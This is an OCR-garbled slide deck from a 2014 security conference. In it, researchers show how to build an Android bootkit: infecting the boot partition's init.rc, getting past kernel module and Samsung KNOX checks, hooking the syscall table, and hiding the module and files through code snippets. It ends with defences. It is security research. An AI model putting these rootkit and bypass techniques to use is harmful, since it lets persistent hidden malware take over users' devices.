Advanced Bootkit Techniques on Android 

|^ Zhangqi Chen & Di Shen @SyScan360 2014 



& Security Researcher in Qihoo360 

& Focus on Malware and Vulnerability on 
Android 

& Be good at reverse engineering 

& Had some experience of Windows Rootkit 

& Hobby: Football match, console games and 
learning Japanese 

Who is Di Shen? 



Who is Zhangqi Chen? 



& A developer on Android kernel and kernel 
modules 



& Analyzing Android kernel vulnerability and 
writing exploit 



& To proof that the boot partition of Android could be 
infected easily 

& Try to launch a kernel module which can run on most 
of Android phones 

la Exploitation of Android Kernel Rootkit 



What we want to do? 



& Most Phone's boot partition was infected,hard to be 
detected and removed 

& A kernel module,launch most phones 

ft bypassed built-in kernel-level security restrictions 

ft bypassed Samsung's TrustZone-based Integrity 
Measurement Architecture (a term of KNOX) 

ft bypassed kernel text-code write protection on 
some phone's kernel such as XIAOMI 

la Rootkit in kernel made all modules invisible 



And the result? 



boot partition on Android 



& where boot image stored in 
ft Linux Kernel(zlmage) 
ft rootfs ramdisk(init.rd) 

& Modified data of ramdisk will not be 
writen back to block device 

& init in ramdiskrfirst process on Linux 

fe Bootloader -> Kernel -> init & init.rc 



Oldboot 



& First found by Qihoo,2013 

& Be pushed into custom roms' boot partition 

& the first Android-based Bootkit as we know 

& Modifed booting script to launch earlier than 
other services of Android 

& We have developed a tool to remove Oldboot: 

http://t.cn/8FRVFqr 



Oldboot.A 



init .rc 
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several challenges of removing Oldboot 



& All modules of malware was pushed into ramdisk 

95 an Antivirus software without root privileges can do 
nothing 

95 malware cannot be delete via filesystem operations 
& Infecting init.rc 

95 launch earlier than Antivirus software 
& Injecting into system_server, no APK files 
& Easy to detect,but hard to remove 
& More info: 

95 http://t.cn/8Fb4eOC 

95 http://tcn/Rv5NiOo 

95 http://blogs.360.cn/360rj 



The future of Android Malware may 



& not ONLY APK files can be infected 

fe Anti Reverse Engineering 

& Try to gain root privileges by using 
kernel exploit or being pre-installed into 
custom ROMs 

& Launch more and more earlier during the 
system start-up 

& Self-protection mechanisms 

& Be invisible to COTS anti- virus software 



Advanced bootkit attack 

^ more advanced than Oldboot 



Maybe we can make it better than Oldboot... 

& Infecting boot partitions surreptitiously. 

95 The malware doesn't need to be pre- 
installed into ROM files. 

& launch kernel module by LKM 
mechanisms on linux 

& hide itself in kernel and nobody can 
detect it from userspace 



What we need to do firstly 



& Gain root privileges 

9$ There is still some kernel exploit can be widely 
used(CVE-2013-2094,CVE-2013-6282, CVE-2014- 
0196, CVE-2014-3153,etc) 

?s Most vendors will not fixup these exploit by OTA 
update immediately :) 

?s Bypass SE Linux restrictions 

?s set process' context u:r:init:s0 or u:r:kernel:sO 

& We wont talk about these techniques this time 



Infecting boot partitions 

^ install the malware 





SyScan 




SyScan.rc 




SyScan.ini 









Installer 


■ 


■ 





/dev/blocK/* */t>oot 




Insmod /sbin/SyScan" 

i 



SyScan 



User mode 



Kernel Mode 



whatS^Gcan do 



bypass restrictions 
hide files 
hide module 
anti ram disk parsing 



install the malware into boot partition 



& Try to find the block device of boot 

& Parse structure of boot image 

& Modify files you intrest 

& Write everything back to block device 



Search the block device of boot 




& There is a symlink 

'Vdev/block/platform/xxx/by-name/boot" 
referreced to the block device normally 

& There is a magic word "ANDROID!"at the 
beginning of boot image header 

& Based on these characteristics,search all 
the block device 



Search the block device of boot 



oot@hwp6-u06:/dev/block/platf orm/hl_ncl*l/by-name # Is -1 



.rwxrwxrwx root root 2014-05-30 13:35 boot -> /dev/ block/ mmcblk0pl2 




I rwxrwxrwx 


root 


root 


2014- 


05- 


30 


13 


35 


cust -> /dev/ block/ mmcblkOplS 


I rwxrwxrwx 


root 


root 


2014- 


05- 


3G 


13 


35 


nlsc -> /dev/block/mncblk0p4 


I rwxrwxrwx 


root 


root 


2014- 


05- 


3G 


13 


35 


nodenlnage -> /dev/block/nncblk0pl3 


I rwxrwxrwx 


root 


root 


2014- 


05- 


30 


13 


35 


nodennvnl -> /dev/ block/ mmcblk0pl4 


I rwxrwxrwx 


root 


root 


2014- 


05- 


30 


13 


35 


nodennvn2 -> /dev/ block/ mncblkOp 15 


I rwxrwxrwx 


root 


root 


2014- 


05- 


30 


13 


35 


nvne -> /dev/ block/ nncblk0p3 


I rwxrwxrwx 


root 


root 


2014- 


05- 


30 


13 


35 


oeninfo -> /dev/ block/ mmcblk0p6 


I rwxrwxrwx 


root 


root 


2014- 


05- 


30 


13 


35 


recovery -> /dev/block/nmcblkOpll 


I rwxrwxrwx 


root 


root 


2014- 


05- 


30 


13 


35 


recovery2 -> /dev/ block/ rnncblkOplO 


I rwxrwxrwx 


root 


root 


2014- 


05- 


30 


13 


35 


reservedl -> /dev/ block/ nncblk0p7 


I rwxrwxrwx 


root 


root 


2014- 


05- 


30 


13 


35 


reserved2 -> /dev/ block/ rnncblk0p8 


I rwxrwxrwx 


root 


root 


2014- 


05- 


30 


13 


35 


round -> /dev/ block/ nncblk0p2 


I rwxrwxrwx 


root 


root 


2014- 


05- 


30 


13 


35 splash -> /dev/ block/ mmcblk0p5 


I rwxrwxrwx 


root 


root 


2014- 


05- 


30 


13 


35 splash2 -> /dev/block/mmcblk0p9 


I rwxrwxrwx 


root 


root 


2014- 


05- 


30 


13 


35 


systen -> /dev/ block/ nncblk0pl6 


I rwxrwxrwx 


root 


root 


2014- 


05- 


30 


13 


35 


userdata -> /dev/ block/ nmcblk0pl9 


I rwxrwxrwx 


root 


root 

rl n 1 r i . t- 


2014- 


05- 
■ 


30 


13 


35 


xloader -> /dev/block/nncblkOpl 




^oot@hwp6- 
DO0OOO00 

D0000010 
D0000020 
30000030 
D0000040 
D0000050 
D0000060 
D0000070 
D0000080 
D0000090 
D0000030 
D00000b0 
D00000C0 
D00000C8 



5:/ # I 
4e 44 
ef 0e 

00 00 

6d 61 

5f 70 
3d 6d 

64 65 

28 6d 

29 2c 
28 72 

65 73 



>usybo? 
52 4f 
00 00 

60 00 
00 00 
6C 6C 

6d 65 
6d 63 
72 29 

69 73 

70 36 
65 73 
65 72 
68 32 



hexdunp 
49 44 21 
00 40 01 

08 00 00 
00 00 00 

6f 63 3d 
6d 3d 31 

62 6c 6b 
2c 70 33 

63 29 2c 

28 6f 65 
65 72 76 
76 65 64 

29 2c 70 



C -n 200 /dev/l 
86 46 51 06 00 

00 00 00 00 00 
00 00 00 00 00 
00 00 00 00 00 

33 38 34 4d 20 
20 6d 6d 63 70 
30 3a 70 31 28 
28 6e 76 6d 65 
70 35 28 73 70 
6d 69 6e 66 6f 
65 64 31 29 2c 
32 29 2c 70 39 



>lock/nncl 

80 00 00 

00 f0 00 

00 00 00 

00 00 00 

6b 33 76 
61 72 74 
78 6c 6f 
29 2c 70 
6c 61 73 
29 2c 70 
70 38 28 
28 73 70 



>lk0pl2 

| ANDROID! * FQ , 



vmalloc=384M k3v | 
2_pmem=l mmcpart | 
s=mmcblk0: pl(xlo | 
ader) ,p3(nvme) ,p | 
4(nisc) ,p5(splas | 
h) 9 p6(oeminf o) ,p | 
7(reservedl) ,p8( | 
reserved2) ,p9(sp | 
lash2),p| 



Parse boot image header 



52/* 

53** + + 

54** | boot header | 1 page 

55** + + 

56** | kernel | n pages 

57*:* + + 

58** | ramdisk | m pages 

59** + + 

60** | second stage | o pages 

6i*+ + + 

62 ** 

63** n = (kernelsize + pagesize - 1) / pagesize 

64** m = ( ramdisk_size + page_size - 1) / pagesize 

65** o = (secondsize + pagesize - 1) / pagesize 
66 ** 

67** Q„ all entities are pagesize aligned in flash 

68** 1. kernel and ramdisk are required (size != O) 

69** 2. second is optional ( secondsize == O -> no second) 

70** 3. load each element (kernel, ramdisk, second) at 
71** the specified physical address ( kerneladdr , etc) 

72** 4. prepare tags at tagaddr. kernel_args[] is 
73** appended to the kernel commandline in the tags. 

74** 5, rO = rl = MACHINETYPE , r2 = tagsaddr 

75** 6. if secondsize ! = 0: jump to secondaddr 
76** else: jump to kerneladdr 
77 V 

7R 



Referrence : AOSP/system/core/f astbootd/bootimg.h 



boot_img_hdr 



28 struct bootimghdr 

29 { 

unsigned char magic [BOOTMAGICSIZE] ; 

unsigned kernelsize; /* size in bytes */ 

unsigned kernel addr; /* physical load addr */ 

unsigned ramdisk_size; /* size in bytes */ 

unsigned ramdisk_add r; /* physical load addr */ 

unsigned second size; /* size in bytes */ 

unsigned secondaddr; /* physical load addr */ 



unsigned tagsaddr; 
unsigned pagesize; 
unsigned unused[2]- 



/* physical addr for kernel tags */ 

/* flash page size we assume + / 

/* future expansion: should be O */ 



unsigned char name[BQQT_NAME_SIZ.E] ; /* asciiz product name */ 

unsigned char cmdline[BQQT_ARGS_3IZE] ; 

unsigned id [8]; /* timestamp / checksum / shal / etc */ 



Referrence : AOSP/system/core/fastbootd/bootimg.h 



Uncompress the ramdisk 



& Ramdisk in boot.img is a gzip file 

gzip -d ramdisk. gz 
& Then there is a cpio-fomat file 

busybox cpio -i -F ramdisk. cpio 

& Finally we got all the files and directories 
stored in ramdisk 




& init.rc 
& init 

& /sbin/adbd 
& zlmage(kernel) 
& sepolicy & filecontext 



iisk are infectable 



Infect boot script and copy my files 



& Add "insmod /sbin/SyScan360" to init.rc 
& Copy my files to /sbin 

£f SyScan360 - the kernel module 

9$ SyScan360.rc - original init.rc 
SyScan360.ini - config file 



Flush the infected ramdisk back 



& Rebuild arguments for boot_img_hdr 

& Get original zlmage 

& Compress the new ramdisk 

<$ archive files as cpio format 

(r ef er rence : AOSP/ system/ core/ cpio . c ) 

95 Then gzip it 

& Make boot header > zlmage and ramdisk. gz together 
as boot.img 

Ref errence : AOSP/ system/ core/ mkbootimg 



Launching the kernel module 

{Maybe more complicated then a 
word "insmod" 



Challenges of developing kernel module for Android 

& We can't find kernel source code for all phones 

& built-in kernel-level security restriction 

& Each version's structures may different,it is 
hard to make our module compatible 



Without devices 7 kernel source code 



& What we need is goldfish's source code only to build 
our module. 

& LKM(loadable kernel module) must be enabled on 
target device 



& Make sure our " struct module" in source code big 
enough by adding 64 words after "struct module" 




built-in kernel-level security restriction 



& Vermagic check 

& module_layout(3.0) or struct_module(2.6) CRC checksum 

& Kernel will also check all the function's CRC that your 
module has referrenced 



vermagic check 




Q0GGQF3 

0O000F3 

0000OF71 



_mod_compat_uersionii2 DCB "parm=compat_uersion :Uersion of the kernel compat backport work",© 
_mod_compat_uersiontype4© DCB "parmtype=compat_uersion :charp" , O 

_mod_compat_base_tree_uersion38 DCB "parm=compat_base_tree_uersion :The git-describe of the upstream b" 
DCB "ase tree",© 

_mod_compat_base_tree_uersiontype36 DCB "parmtype=compat_base_tree_uersion :charp" , 0 
_mod_compat_base_tree3i# DCB "parm=compat_base_tree :The upstream tree used as base for this ba" 
DCB "ckport",© 

_mod_compat_base_treetype32 DCB "parmtype=compat_base_tree :charp" , 0 

_mod_compat_base_tree3© DCB "parm=compat_base_tree :The upstream uerion of compat. git used",© 
_mod_compat_basetype28 DCB "parmtype=compat_base :charp" , 0 
_mod_license5 DCB "license=GPL" , © 

moddescriptionU DCB "description=Kernel compatibility module", 0 
_mod_author3 DCB "author=Luis R. Rodriguez", 0 

mod_license1©1 DCB "license=Dual BSD/GPL", O 

modauthorl 00 DCB "author=Broadcom Corporation",© 
_mod_description99 DCB "description=Cordic functions",© 
_mod_license87 DCB "license=Dual BSD/GPL", O 
_mod_author86 DCB "author=Broadcom Corporation",© 

_mod_description85 DCB "description=CRC8 (by Williams, Ross N.) function",© ■ 
ALIGN it 

madylBdnpandc DCB "d8pandc-"|B | 

_mod_uermagic5 DCB "uermagic=3 . O.8-O0771-g0c49f 24 SMP preempt nod unload hRMu7 p2u8 
DCB © 

ft LIQM *t 



vermagic in .modinfo 



CTirrent_£s_time 
nsecs_to_j i f£i es 

'_free_all[5tructtty_5truct * vty)\ 

L^MHL hUUUmilU 

| local_bh_di sable 

local_bh_enable 

do_so£tirq 

do_softirq 

1 0 c al_bh_enabl e_i p 

local_bh_enable 

rai se_softi.rq_i.rqof f 

ns_capable 

task_ns_capable 

c ap abl e 

has_capabili ty_noaudi t 
ptrace_resume 

ptrace_detach. part. 3 
ptrace_link 



EDM 
EDM 
ROM 
EDM 
ROM 
EDM 
ROM 
EDM 
ROM 
EDM 
EDM 
EDM 
EDM 
EDM 
EDM 
EDM 
EDM 
EDM 



R0M:C 
R0M:C 
R0M:C 
R0M:C 
R0M:C 
R0M:C 
R0M:C 
R0M:C 
R0M:C 
R0M:C 
R0M:C 
R0M:C 
R0M:C 
R0M:C 
R0M:C 
R0M:C 
R0M:C 



uermagic 



05D5676 
05D5677 
05D5678 
©5D5679 
05D567H 
05D567B 
05D567C 
05D567C 
©5D56BE 
05D56BF 

©5D56C0 modinfo 

05D56C1 

©5D56C2 

©5D56C3 

05D56C4 

©5D56C5 

©5D56C6 



attrs 



DCB 


0 




DCB 


1 




DCB 


© 




DCB 


1 




DCB 


0 




DCB 


© 




DCB 


"3.8. 




DCB 


" ",0 




DCB 






DCB 


© 




DCB 


0x3© 


; 


DCB 


0x1 f 




DCB 


0XH2 




DCB 


OxCO 




DCB 


0x4C 


; 


DCB 


0X1 f 




DCB 


0XH2 





vermagic string in kernel 



Import function's CRC check 



i iiiuuxiiru . 



Imodinfo :0O0O0O30 
Imodinfo: 00000030 
Imodinfo: 00000030 
Imodinfo: 00000030 



Segment type: Pure data 

AREA .modinfo, DATA, READONLY , ALIGN=0 
: ORG 0x30 



[modinfo: OOO0O03O aLicenseGpl DCB 
Imodinfo :0000003c aAuthor JamesBot DCB 
Imodinfo: OO0O0O53 aDescriptionScs DCB 
Imodinfo: OO0O0O73 aDepends DCB 
[modinfo :0000007c aUermagic3_0_31 DCB 

DCB 
ends 



| modinfo :0000007c 
Imodinfo :0000007c ; 
I modinfo :0000007c 
versions : 000000C0 
versions : 000000C0 
versions : 000000C0 
versions : 000000C0 
versions : 000000C0 
versions : 000000C0 
versions : OOOOOOCU 
versions : 000000D2 
versions : 000000D3 
versions : OOOOOODU 
versions :00O000D5 



■license=GPL",0 
"author= James Bottomley",0 
"description=SCSI wait for scans", O 
'depends=" , 0 

"vermagic=3 . 0.31-CM SMP preempt nod unload modversions ARMv7 p 
■ ",0 



.modinfo 



Segment type: Pure data 

AREA versions. 



DATA, READONLY 



; UHb OKLO 

DCD 0XA3P26650 
aModule layjout DCB "module layout" , O 
DCB 0 



- CRC 



— func/struct name 



DCB 
DCB 
DCB 



kcrctab:CQMiDDBC kcrctabmodtimer DCD 0xC8FD727E 

kcrctab:CQMiDDCQ kcrctabmodtimerpending DCD 0x61C243FC 

kcrctab:C044DDC4 kcrctabmodtimerpinned DCD 0x227BADD6 

kcrctab:CQMiDDC8 kcrctabjiodulelayout DCD 0x965F803D 

kcrctab:COUUDDCC kcrctabmountbdeu DCD GxAC7390EA 

kcrctab iCOUUDDDO kcrctabmountnodeu DCD GxE2D90CE2 

kcrctabiCOUUDDDU kcrctabmountns DCD 0x1620F21B 

kcrctab:CGMiDDD8 kcrctabmountpseudo DCD 0x36920336 

kcrctab:COMiDDDC kcrctabmountsingle DCD 0x23CBD939 

kcrctab:C044DDE0 kcrctabmountsubtree DCD 0xA6E7131E 

kcrctab:C044DDE4 kcrctabmpagereadpage DCD QxC7QA1Q14 

kcrctab:CGMiDDE8 kcrctabmpagereadpages DCD 0xB9AE7080 



How to bypass these restrictions 



& Kernel module's format is ELF 

& We can find some modules from target device as a referrence 

& Try to find a right vermagic from referrence module and copy 
it to our module. 

& module_layout structure's CRC value is stored from the 

beginning 64 bytes of " versions" section, copy the value 

from referrence module to ours. 

& We don't import any kernel functions to bypass other 
functions' CRC checking. I will find address of functions by 
myself while initializing. 



Bypass Samsung's authenticate mechanism 



& KNOX is enabled on some of Samsung devices,LKM 

authentication only authorizes the kernle modules that will be 
loaded into the kernel. (CONFIG_TIMA_LKMAUTH=y) 

& Modify two instructions of function copy_and_check through 
/dev/kmem access technique , lkmauth will not be called any 
more 




Bypass Samsung's authenticate mechanism 



loc C00B92F4 



CODE XREF : copyandcheck .isra .22+74? j 



hill II 


pa DC 
no, Kb 


LUn 


p-i — flvp np Ji arar 


nuu 


pn ff j| 


pi 

dL 


FlPFlCFip 


LNr 


DO ft n 
no, Ho 


pur 


IDC UOOdVO lo 


i nuu 
LUrtn 


pq rpr ff Hv-1 fll 
no , [n? ,4(ua 1 oj 


PMP 
UNr 


PQ ff-1 
no, HI 


PMfT 
Dlit 


IOC LoUdVOId 


Mnii 


nu. n_> 


PI 

dL 


Plr CneCK dr CM 


urir 


p H^^Tn^™ 

no, Ho 


BEQ 


loc_C0BB9618 


i npu 
LUlin 


PQ rPC ffflvOfTl 

no, [ Kb- , HUXZ t J 


PMP 
UNr 


PQ ftfjlvQQ 

no, floXZo 


BNE 


loc_CQQB9o18 


LDRH 


R1, [R5,ttOx30] 


LDR 


R2, [R5,ttOx20] 


NLA 


R3, R3, R1, R2 


CMP 


R6, R3 


BCC 


loc C00B9618 


LDR 


R0, =lkmauth_mutex ; 


LDR 


R4, =module_addr_max 


EL 


mutex lock 


MOU 


R1, R6 


LDR 


R0, =0xC0B6OAAB 


BL 


printk 



replace the followed two instructions to bypass lkmauth 

lkm auth code start from 



Bypass Samsung's authenticate mechanism 



MOU 



R7, ttOxFFFFFFFF 



loc C0OB95Fi| 



; CODE XREF: copy_and_check .isra .22+29BTj 
LDR RG, =lkmauth_mutex 
BL mutex unlock 



CMP R7, ttO 

BNE loc C00B9618 



set 


loadinFo 












LDR 


R3, [SP,ttQx8Q+uar 


_5C] 






STMIH 


R3, {R5,R6> 








B 


checkstack 




loc 


_C00B9610 




> 


CODE 










copy_ 






MOU 


R7, »0xFFFFFFF2 








B 


loc C00B961C 





■ ; lkm_auth end flag 

i f author i z e d, c hange 
info->hdr & len 



Initialization of kernel module 



& Modify module structure,make init/exit can be 
called by kernel 

& Find export function table of kernel (kallsymbol) 

& Find address of kernel functions by kallsymbol 

& Find syscall table 

& Hook syscall table 



Modify module structure 




Target phone 


Goldfish 


struct module 
{ 


struct module 

r 

{ 


/* Startup function. */ 

int (*init) (void) ; Qffgg^ 3 


/* Startup function. */ 

int (*init) (void) ; offset A 


/* Destruction function. */ 

void (*exit) (void) ; QffggJ- 

}; 


/* Destruction function. */ 

void (*exit) (void) ; Qffggj- g 

int fill [64] 

}; 


a == 


A ? 


b == 


B ? 



Find export function table of kernel 



19 struct kerne l_symbol 

20 { 

21 unsigned long value ; 

22 const char * name ; 

23 }; 



OxC??????? 



V 



OxC??????? 
is string 



Search memory from 0xC0008000 with such features 



Find export function table of kernel 



& Find address of kallsyms_lookup_name first 




$ Then you know every function address by using this call 
& Such as printk , _kmalloc 



Searching sys_call_table 



341 ENTRY (vector swi) 



399 



425 



adr tbl, sys_call_table 

ldrcc pc, [tbl, scno, lsl #2] 



176 scno 

177 tbl 

178 why 

179 tsk 



. req 
. req 
. req 
. req 



r7 
r8 
r8 
r9 



@ syscall number 

@ syscall table pointer 

@ Linux syscall (1= 0) 

@ current thread info 



Searching sys_call_table 



exception vector table 

In the case of ARM process, exception vector 
starts from OxffffOOOO.And there is a 4 byte 
instruction "ldr pc, [pc, #xxx] " to branch 
to the software interrupt handler(vector_swi) 
at 0xffff0008 

Then we search from vector_swi,if we get a 
instruction "add r8,pc,#yyy" , yyy+8 is the 
address of sys_call_table 



Searching sys_call_table 



Find if from call stack 

Module's init routine is called by sys_init_module; 

sys_init_module is called by vector_swi. 

At the beginning of sys_init_module,regs are: 

• R7:syscall number 

• R8: address of syscall table 

• R9:thread_info 

sys_init_module will push r7~r9 to stack. We can 
find sys_call_table by searching stack, because we 
always know the value of thread_info. 

(thread_info = SP & OxFFFFEOOO ) 



Hook syscall functions 



& What we only need to do is modifying the value of 
sys_call_table[call_number] 

fe But what if sys_call_table is READ-ONLY? 

9s Find physical address of page table 

By coprocessor: cpl5, c2, cO 
& Remap page table writable 

& Make the entry of syscall table in page table 
writeale 

9s We find this feature on some device of XIAOMI 



Make syscall table writable 




Testing result 





Vendor 


Model 


CPU 


cores 


ARM 
version 


kernel 


R0 of 
code 


compiler 


Android 


Result 


1 


HTC 


T320e 


MSM8255 


1 


v7 


3. 0. 16 


no 


4. 4. 3 


4. 0. 3 


pass 


2 


0PP0 


x909 


APQ8064 


4 


v7 


3. 4. 0 


no 


4. 6. x 


4. 2. 2 


pass 


3 


Huawei 


G520 


MSM8x25 


4 


v7 


3. 4. 0 


no 


4. 6. x 


4. 1. 2 


pass 


4 


Huawe i 

J. 1 LiLi VV V_/ _l_ 


G510 


MT6517 


2 


v7 


3. 0. 13 


no 


4. 4. 3 


4. 0. 4 


pass 


5 


Huawei 


G610T 


MT6589M 


4 


v7 


3.4.5 


no 


4.6.x 


4. 2. 1 


pass 


6 


Lenovo 


A798t 


MT6577 


1 


v7 


3. 0. 13 


no 


4. 4.3 


4. 0 


pass 


7 


Lenovo 


A288t 


SC8810 


1 


v7 


2. 6. 35. 7 


no 


4. 4.3 


2. 3. 5 


pass 


8 


Samsung 


GT-N7100 


Exynos 4412 


4 


v7 


3.0.31 


no 


4. 4.3 


4. 1. 2 


pass 


9 


Samsung 


GT-I9508 (S4) 


APQ8064 


4 


v7 


3.4.0 


no 


4.6.x 


4. 2. 2 


pass 


.0 


Samsung 


GT-S7562 


MSM7227A 


1 


v7 


3. 0. 8 


no 


4. 4. 3 


4. 0. 4 


pass 


11 


Xiaomi 


IS 


MSM8260 


2 


v7 


3. 0. 8 


yes 


4. 4. 3 


4. 0 


pass 


12 


Xiaomi 


2A 


MSM8260A 


2 


v7 


3.4.0 


no 


4.6.x 


4. 1. 1 


pass 


13 


ZTE 


V889S 


MT6577 


2 


v7 


3.4.0 


no 


4.6.x 


4. 1. 1 


pass 


14 


ZTE 


V960 


MSM7227T 


1 


v6 


2. 6. 35. 7 


no 


4. 4.3 


2. 3. 5 


pass 


15 


LG 


Nexus 4 


APQ8064 


4 


v7 


3.4.0 


no 


4. 6. x 


4. 2. 2 


fail 



A series of hiding tricks 

^ I will be invisible 



Hide the bootkit 



& Hide kernel module 
& Hide the infected init.rc 
& Hide files in /sbin 

& Hide the data read through block device access 



Hide kernel module 



& Direct kernel object manipulation 

& this_module is module's kernel obect 

& Remove this_module from global list 

"modules'' 

& Be invisible to lsmod command 

& Rmmod can't unload the module 



//then hide driver mod 

_this_module. list _prev->next = _this_madule. list. next ; 
t/risroodule. list, next ->p rev = _this_module. list . p rev ; 

t/rismorfLrle-list-next = & thi s_modu I e. list ; 

tMsmodule.list .prev = & thismodule .\ist ; 



309*endif 



Hide the infected init.rc 




& "insmod /sbin/SyScan360" must be hidden 

& Let others read the original one without a 
insmod 

& I tried two ways to hide it 
Hooking syscall table 
ys Hooking VFS 



Hookine VFS 



task struct 



sigpending 



files struct 



close on exec 




private data 



f pos 



private data 



Modifying the table , every root 
filesystem access will be tracked. 



file operations 



There's a opration pointer table in 
every file object. 



readdir 



syscall read 




fake aio read 



file_ops.aio_read 



Can VFS hooking hide everything ? 



& Hooking pointers in files_oprations can modify 
the data while others read init.rc. 

& But we cannot stop others from calling mmap. 

£f Hooking pointers in address_space_oprations 
may solve this problem,but it is complicated. 



File relocation 



& Modifying the data while others accessing files is complicated 
just as we talked 

& File relocation may be very simple. 

& Hooking open/openat syscall, returns /sbin/SyScan360.rc 's file 
object instead of init.rc's one. 

& /sbin/SyScan360.rc is a backup of the original init.rc 



202 int filerelocf struct file* protected file, char* fake file r imt flags, umode_t mode){ 
int ret = 1; 

204 

205 int fd = 0™ 

struct file *f = myfilpopenif akef ile, flags, mode); 

207 

208 if ( !I5_ERR_0R_NULL(f ) ! IS_ERR_0R_NULL ( protectedf ile ) ) { 
209 

210 f->f_dentry = p rot ected f ile ->f dent ry ; 

211 

212 fd = my_get_unused_fdi) m f 

213 my fd installifd, f); 

214 return fd; 

215 } 

216 return ret; 

217 }| 



Hide files in /sbin 



& Kernel module,backup of init.rc,and config files 
are in /sbin. 

& Hide all of them by hooking readdir routine of 
VFS 



static int myrootf illdir ( void * buff r const char *name r 

int namelen , loff t offset, u64 ino r unsigned int d type) { 

I 

if (my_ st rstri name, "SyScan" ) ) 
return 0; 

return orootfilldiri buf f r name, namelen, of f set r ino r d_type) ; 

} 

static int myvf sreaddir ( struct file *f ile, void *dirent , filldir t f illdir){ 
int ret = -l; 
readdirptr ptrj 

ptr = vfs_hooks_ root fs [8] .oldvf saddr ; 
orootf illdir = filldir; 

ret - pt r( file r di rent r my_root_f illdir ) ; 
return ret - 



Hide the data read through block device access 

& We have hidden all files and module 
information 

& But anti-virus software may access block 
device directly 

£f Just like what we did to infect boot partition 
& dd if=/dev/block/** of=outdir 

& We relocate this kind of access by the same way. 

9s The original boot.img will be hidden in /data, we 
relocate the access by hooking syscall open and 
openat. 



Defending and detecting Android bootkit 

^ Let's talk about defence 



Trust boot 



& Only bootloader can do this 

£f boot image authentication by Qualcomm LK 
£f verify_signed_bootimg in aboot 

& Kernel can do nothing(such as dm-verity) 
Kernel can verify /system partition 
9s But cannot verify itself while start-up 



Anti Rootkit Module 



& Build-in kernel module to detect malware 

Must launch erlier than malware 

& Detect kernel hooking 

& Make a restrition on block device aceess 

& But bootkit malware may disable this kind of 
module using kernel exploit,just like what a 
bootkit do to SELinux 



Disable LKM 

& Loadable Kernel Module 

& There is no sys_init_module routine in kernel 
image if you disable it before compiling 

& Kernel module cannot be load easily 
& Kernel will not be badly abused 

But we can access /dev/kmem to patch the kernel 

& Nexus and some of Samsung's devices has 
disabled LKM after Android 4.3 

& AH the kernel modules must be permanently 
built into kernel without LKM. 



Fix up vulnerability 



& Without exploit, bootkit can do nothing. 

& Update to the newest Android version of your 
device 

& Vendors should at least fix up kernel's 
vulnerability, and push OTA update 
frequently. 



DEMO 



Q&A 



THANK YOU! 



